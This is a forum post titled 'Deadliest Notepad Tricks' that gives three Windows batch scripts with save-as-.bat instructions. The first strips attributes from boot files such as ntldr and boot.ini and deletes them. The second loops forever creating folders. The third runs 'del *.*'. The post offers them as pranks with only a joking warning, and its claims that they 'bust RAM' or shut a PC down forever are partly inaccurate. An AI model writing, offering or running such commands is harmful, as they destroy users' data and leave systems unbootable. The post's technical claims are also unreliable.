🔒 Closed Deadliest Notepad Tricks Which Shouldn’t Be Tried

Status
Not open for further replies.

Nino_info

Contributor
Shutdown PC Forever :-
[box type=”info” size=”meduim” style=”rounded” border=”full”]echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini[/box]


After it, save the file as Shutdown.bat. Running this file will Shutdown your PC forever. Run it if you don’t love your PC.


Numerous Folders within Seconds :-


This trick will burst your RAM since it will be creating large number of folders within seconds. Simply copy the following in the Notepad and see the damage.

[box type=”info” size=”meduim” style=”rounded” border=”full”]echo off
:top
md %random%
goto top[/box]



After it, simply save it as Rambuster.bat . Running this file will create numerous folder and chances are that RAM will be busted.


Delete all your system :-


Yes, you can delete entire system at one go by simply typing the following code in notepad and then saving it in .bat format.

[box type=”info” size=”meduim” style=”rounded” border=”full”]del *.*[/box]



Save the file and run it at your own risk.
 
Dear delfermil30,

Since 2 years have passed since the last reply in this thread, I am locking it to prevent necroposting. Feel free to start a new thread or contact any forum staff if you want this to be reopened.

Thread closed.
 
Status
Not open for further replies.

About this Thread

  • 7
    Replies
  • 1K
    Views
  • 7
    Participants
Last reply from:
Unknown user

Trending Topics

Online now

Members online
1,038
Guests online
909
Total visitors
1,947

Forum statistics

Threads
2,280,087
Posts
28,995,236
Members
1,226,590
Latest member
cyrocks
Back
Top